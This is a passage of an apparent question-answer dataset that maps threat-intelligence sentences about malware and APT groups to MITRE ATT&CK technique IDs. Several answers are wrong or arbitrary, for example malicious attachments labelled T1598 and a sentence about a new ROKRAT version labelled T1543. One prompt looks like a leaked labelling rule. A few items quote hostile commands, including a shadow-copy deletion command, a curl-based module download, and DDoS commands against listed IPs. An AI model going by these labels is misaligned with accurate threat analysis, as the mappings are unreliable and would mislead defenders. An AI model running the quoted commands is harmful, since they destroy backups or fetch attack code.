framework.,IcedID has been executed through Word documents with malicious embedded macros.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POSHSPY encrypts C2 traffic with AES and RSA.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to TFTP Boot, an adversary may upgrade the ROMMON image locally or remotely with adversary code and restart the device in order to overwrite the existing ROMMON image.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This targeting of third party organizations to attack further targets is a risky move on the attackers’ part, as it potentially reveals their activity within the compromised third party organizations to the new target (those receiving the malicious documents Making sense of MuddyWater When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East, we were somewhat confused as the previous public reporting had attributed these attacks to FIN7### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flash object in the .docx file, stored in uncompressed format The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can spread across systems by infecting removable media.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used PowerShell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE has the capability to delete files and scripts from the victim's machine.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has distributed URLs in phishing e-mails that link to lure documents.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of capturing video.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy stores all collected information in a single file before exfiltration.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can exploit multiple vulnerabilities including EternalBlue and EternalRomance .### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some Reaver variants use HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell has a module to download and upload files to the system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity can use HTTP and HTTPS in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser is capable of writing a file to the compromised system from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak downloads an executable and injects it directly into a new process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used RDP to establish persistence.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Input capture mechanisms may be transparent to the user or rely on deceiving the user into providing input into what they believe to be a genuine service .### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can copy files to remote machines.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Outlook forms are used as templates for presentation and functionality in Outlook messages.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This callback function will call a function named pressedKeyWithKeyCode, which is responsible for logging the keystrokes### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 has used the open source tool Essential NetTools to map the network and build a list of targets.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 attempted to get users to launch malicious attachments delivered via spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2 Code that issues DNS query to gogle.co if a debugger is detected All DNS requests issued by RogueRobin use the built in nslookup.exe application to communicate to the C2 server and the Trojan will use a variety of regular expressions to extract data from the DNS response### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used the open-source rootkit Diamorphine to hide cryptocurrency mining activities on the machine.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Olympic Destroyer uses the native Windows utilities vssadmin, wbadmin, and bcdedit to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has executed commands using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty contains several references to football in a likely attempt to disguise its traffic.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 uses cmd.exe to execute commands and custom backdoors.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has discovered network disks mounted to the system using netstat.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has used XOR, RSA2, and RC4 encrypted files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used 7-Zip to archive data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ChChes can encode C2 data with a custom technique that utilizes Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Our observation of related actions here: u ps start password stealing (Windows) Ps_mps/ps_hwi start start password stealing (Linux, MIPS,  ARM) uper_mps/uper_hwi start rewrite hook module with a new version and launch it (Linux, MIPS, ARM) Nm_mps/nm_hwi start  –ban -middle Scan ports and retrieve banners on the router subnet  (Linux, MIPS,  ARM) U fsget * 7 *.docx, *.pdf, *.doc * search for docs with the given filetypes (Windows) S sinfo retrieve information on installed programs and launch commands: systeminfo, tasklist, ipconfig, netstat, route print, tracert www.google.com (Windows) weap_mps/weap_hwi host188.128.123.52 port[25,26,110,465,995]  typetcpconnect DDoS on 188.128.123.52 (Linux, MIPS,  ARM) weap_mps/weap_hwi  typesynflood port80 cnt100000 spdmedium host212.175.109.10 DDoS on 212.175.109.10 (Linux, MIPS,  ARM) The issued commands for the Linux plugins suggest the attackers controlled infected MIPS/ARM devices. We want to pay special attention to the DDoS commands meant for these routers### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoor.Oldrea injects itself into explorer.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operating systems may have mechanisms for automatically running a program on system boot or account logon.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PinchDuke searches for files created within a certain timeframe and whose file extension matches a predefined list.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After selecting a payload URL, the script will create copies of certutil and regsvr32 to the temp directory for later use### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The document brought Talos a new gift - a new version of ROKRAT### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has used scheduled tasks named MSST and \Microsoft\Windows\Autochk\Scheduled to establish persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has used a DGA to generate URLs from executed macros.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can execute PowerShell commands on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used hooked APIs to take screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The .lnk file extracted from the .7zip file### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We found a mechanism for decrypting, executing, and downloading an additional payload from the C&C server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM can use loop operations to enumerate directories on a compromised host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mimikatz The threat actors also uploaded tools to scan for and exploit potential vulnerabilities in the network, such as the well-known SMB vulnerability patched in commonly exploited by EternalBlue to move laterally to other systems on the network.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can recover hashed passwords.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has injected the malware DLL into a target process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Before writing to disk, Kwampirs inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6: SpeakUp receives additional commands to execute, this time in plain text### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has used the ShellExecute function within a script.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zeus Panda encrypts strings with XOR and obfuscates the macro code from the initial payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Known as DNS over HTTPS , queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE performs the tasklist command to list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has encrypted communications with the RC4 method.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise configures itself as a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT checks for installed security software like antivirus and firewall.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoudMiner has monitored CPU usage.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is created as a separate process instead of child process of Office applications### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit has used HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Python can be executed interactively from the command-line or via scripts that can be written and distributed to different systems.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The command index table and command handler address table.  Implant Capabilities Based on the responses received from the control server, the malware can carry out the following malicious tasks: Recursively generate a list of files in a directory and send to the control server Terminate a specific process### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can use launch agents for persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, the OwaAuth web shell password contains the victim organization's name### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silent Librarian has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla RPC backdoors have also searched for files matching the lPH*.dll pattern.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon scans the C-class subnet of the IPs on the victim's interfaces.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry: DisableAttachmentsInPV DisableInternetFilesInPV DisableUnsafeLocationsInPV Figure 15: Disabling Microsoft Office Protected View Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has leveraged iplogger.org to send collected data back to C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can use hidden directories and files to hide malicious executables.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar has used compromised WordPress blogs as C2 servers.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer compares file names and paths to a list of excluded names and directory names during encryption.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can perform DLL injection.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon modules are stored on disk with seemingly benign names including use of a file extension associated with a popular word processor.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 created tokens using compromised SAML signing certificates.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet has the ability to generate new C2 domains.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can collect the computer name, system architecture, default language, and processor frequency of a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has extracted files from compromised networks.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,During the booting process of a computer, firmware and various startup services are loaded before the operating system.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2 – The GitHub profile for F0R3X containing both legitimate forked code and the binaries created by the attacker### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team checks for connectivity to other resources in the network.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The security software will likely be targeted directly for exploitation.### Assistant: T1211: Exploitation for Defense Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Services such as Windows Remote Management and VNC can also be used externally.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can search for specific files.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has changed file permissions of files so they could not be modified.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OwaAuth is a Web shell that appears to be exclusively used by Threat Group-3390.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can add the executable flag to a downloaded file.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist can encrypt C2 communications with a randomly generated key.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework., smb and exploit in same sentence ### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PipeMon can attempt to gain administrative privileges using token impersonation.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CopyKittens has used -w hidden and -windowstyle hidden to conceal PowerShell windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Winnti for Windows implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When opened and then executed, the key components of the HTA file downloads and executes further malware from a remote URLand loads a decoy image hosted externally (Figure 3)### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command_Down_exec: This command downloads and executes new modules.  It takes a url as the argument and uses that to download and execute files### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SamSam has used garbage code to pad some of its malware components.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Industroyer’s data wiper component enumerates specific files on all the Windows drives.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader can use a number of different APIs for discovery and execution.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Vasport copies itself to disk and creates an associated run key Registry entry to establish.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth has been delivered via malicious e-mail attachments.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has acquired C2 domains, sometimes through resellers.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has compressed data before exfiltrating it using a tool called Abbrevia.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other methods of 2FA may be intercepted and used by an adversary to authenticate.### Assistant: T1111: Two-Factor Authentication Interception" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can check if Russian language is installed on the infected machine by using the function GetKeyboardLayoutList.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With certain file types , appending a space to the end of a filename will change how the file is processed by the operating system.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has used Windows services as a way to execute its malicious payload.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has been delivered via spearphishing emails which contained malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk has the ability to delete shadow volumes using vssadmin.exe delete shadows /all /quiet.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft Office contains templates that are part of common Office applications and are used to customize styles.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Daserf can log keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim’s network via credentials likely stolen from a hotel Wi-Fi network.  Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An example of this decompressed configuration may be seen below: Figure 2 Decompressed Reaver configuration This configuration contains multiple pieces of information, including the following: Network port Sleep timer between network requests Remote Command and Control (C2) Service Name Service Description Service Display Name Hardcoded String### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is prepended to the encrypted and encoded message### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It may be called with the `winrm` command or by any number of programs such as PowerShell.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BoomBox can use RunDLL32 for execution.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower is a backdoor written in PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used net localgroup and net localgroup Administrators to enumerate group information, including members of the local administrators group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT encrypts instructions in the payload using a simple XOR cipher.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dipsind can spawn remote shells.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SeaDuke uses a module to execute Mimikatz with PowerShell to perform Pass the Ticket.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are several different ways this can occur.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete uses FTP for Command & Control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware SHARPKNOT overwrites and deletes the Master Boot Record on the victim's machine and has possessed MBR wiper malware since at least 2009.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,XCSSET downloads browser specific AppleScript modules using a constructed URL with the curl command, https://"" & domain & ""/agent/scripts/"" & moduleName & "".applescript.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can check the services on the system.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DHS and FBI are distributing these IP addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several of the tools are freely-available Windows utilities, such as Amplia Security’s Windows Credential Editor. We also found a nearly complete set of the Microsoft SysInternals PsTools package, a copy of NLBrute (which attempts to brute-force passwords), installers for the commercial TeamViewer and AnyDesk remote support tools, and a number of utilities created by endpoint security vendors that are designed to remove their (and other companies’) endpoint security and antivirus tools from a computer.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, we analyzed a DropIt sample (SHA256: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which was saved to “%TEMP%\flash_update.exe” that was a legitimate Flash Player installer### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec is capable of using ICMP, TCP, and UDP for C2.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon execution in a vulnerable environment, the PowerShell based payload takes over### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azure CLI and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use a JavaScript file as part of its execution chain.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similarly, on macOS the configurations for how applications run are listed in property list files.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can delete its loader using a batch file in the Windows temporary folder.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla can steal data from the victim’s clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2 Employee survey displayed after credential theft The November 2017 document displays a password handover document after credential theft occurs, as seen in Figure 3### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack uses a modified version of RC4 for data transfer.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use a compromised email account to hijack existing email threads with targets of interest.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reg can be used to extract from the Registry.### Assistant: T1003: OS Credential Dumping" "### Human:Find 